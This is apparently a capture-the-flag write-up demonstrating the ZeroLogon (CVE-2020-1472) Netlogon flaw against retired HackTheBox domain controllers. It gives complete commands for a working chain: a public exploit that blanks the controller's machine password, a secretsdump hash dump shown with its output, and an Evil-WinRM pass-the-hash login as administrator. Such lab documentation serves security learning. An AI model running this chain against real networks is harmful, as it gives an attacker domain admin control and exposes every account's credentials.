ZeroLogon - Owning HTB machines with CVE-2020-1472
CVE-2020-1472 was patched in August 2020 by Microsoft, but it didn’t really make a splash until the last week when proof of concept exploits started hitting GutHub. It truly is a short path to domain admin. I’ll look at the exploit and own some machines from HTB with it.
Background
CVE-2020-1472, or ZeroLogon, abuses a bug in a customized authentication scheme used by the Netlogon Remote Protocol. Secura put out a whitepaper about the vulnerability that goes into all the details of what is broken. The gist is the authentication protocol insecurely uses AES-CFB8, which allows the attacker to spoof the client credential, disable signing and sealing, spoof a call to the this RPC service, which happens to be responsibly for letting a computer update its password, but only to an empty password.
However, once the attacker knows the machine account password for a domain controller, they are able to dump all the hashes from the computer, where it is then trivial to use the administrator hash to get a session. This means that any attacker with network access to an unpatched domain controller can become domain admin.
This exploit will change the machine password of the target domain controller to be the empty string. This will break things. Do not use these outside a CTF / lab environment without fully testing and understanding the risks, and measuring them against your tolerance. Many of the POCs come with scripts to restore the machine password after the attack, which could be useful for helping to restore the machine (but again, you’ll want to test and get comfortable with those).
Setup
POC
There are a bunch of POCs out there. I ended up playing with this one. I just went into /opt on my local machine and ran git clone https://github.com/dirkjanm/CVE-2020-1472.git to get a copy.
Impacket
Impacket is a collection of Python classes that work with network protocols, and are specifically really good at Windows protocols. All of the POCs I found use Impacket to do the Windows-specific protocols. Unfortunately, the POCs all need the latest version of Impactet, which isn’t what is available through the package managers yet. And, you can really dork your computer (or VM) by installing Python tools in multiple ways.
To get around this, I installed a copy of Impacket into a Python virtual environment. I cloned a copy with git clone https://github.com/SecureAuthCorp/impacket.git. Then, cd impacket, and I’ll create a virtual env with python3 -m venv venv. Now activate it, and see that the prompt changes:
root@kali:/opt/impacket# source venv/bin/activate
(venv) root@kali:/opt/impacket#
Now pip install . will install Impacket. As long as I’m running with the virtual env activated, it will all work nicely together. To deactivate the virtual environment, I’ll just run deactivate.
Example - Monteverde
There are tons of boxes on HTB that are domain controller to test on. I’ll start with Monteverde. If I try to dump the password hashes using the machine account and an empty password, it fails:
(venv) root@kali:/opt/impacket# secretsdump.py -just-dc -no-pass MONTEVERDE\$@10.10.10.172
Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...
STATUS_LOGON_FAILURE calls out an invalid logon.
Now I’ll run the exploit:
(venv) root@kali:/opt/impacket# python /opt/CVE-2020-1472/cve-2020-1472-exploit.py MONTEVERDE 10.10.10.172
Performing authentication attempts...
===========================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string
Result: 0
Exploit complete!
Now, I’ll run the same secretsdump command. I’ll give it a username of the machine account (typically the hostname with a $ appended), and use the -no-pass flag:
(venv) root@kali:/opt/impacket# secretsdump.py -just-dc -no-pass MONTEVERDE\$@10.10.10.172
Impacket v0.9.22.dev1+20200915.115225.78e8c8e4 - Copyright 2020 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:100a42db8caea588a626d3a9378cd7ea:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3480c0ed5001f14fa7a49fdf016043ff:::
AAD_987d7f2f57d2:1104:aad3b435b51404eeaad3b435b51404ee:599716220acac74a2d9049230d3a8b06:::
MEGABANK.LOCAL\mhope:1601:aad3b435b51404eeaad3b435b51404ee:f875f9a71efc6b0ee93dd906aedbc8b6:::
MEGABANK.LOCAL\SABatchJobs:2602:aad3b435b51404eeaad3b435b51404ee:fd980edb4732d8175a52a9b5e1520bc1:::
MEGABANK.LOCAL\svc-ata:2603:aad3b435b51404eeaad3b435b51404ee:d192ea098c69b7d26c50808a5ac75bea:::
MEGABANK.LOCAL\svc-bexec:2604:aad3b435b51404eeaad3b435b51404ee:2e4de9439cfd99f861dec8fc460c47e3:::
MEGABANK.LOCAL\svc-netapp:2605:aad3b435b51404eeaad3b435b51404ee:6bd17d9707c3da465b96cdf0e1a3a4d6:::
MEGABANK.LOCAL\dgalanos:2613:aad3b435b51404eeaad3b435b51404ee:7a695f4cc64a302d8e53da58f0885736:::
MEGABANK.LOCAL\roleary:2614:aad3b435b51404eeaad3b435b51404ee:cb3fa0132c099c5b29c30ef128e90ad8:::
MEGABANK.LOCAL\smorgan:2615:aad3b435b51404eeaad3b435b51404ee:3a2b291c4291a1063a4b32e1770e5388:::
MONTEVERDE$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...[snip]...
I can use that administrator hash to get a WinRM session with Evil-WinRM:
root@kali:/opt/impacket# evil-winrm -u administrator -i 10.10.10.172 --hash '100a42db8caea588a626d3a9378cd7ea'
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
I tried the same process on a handful of other retired machines, with total success.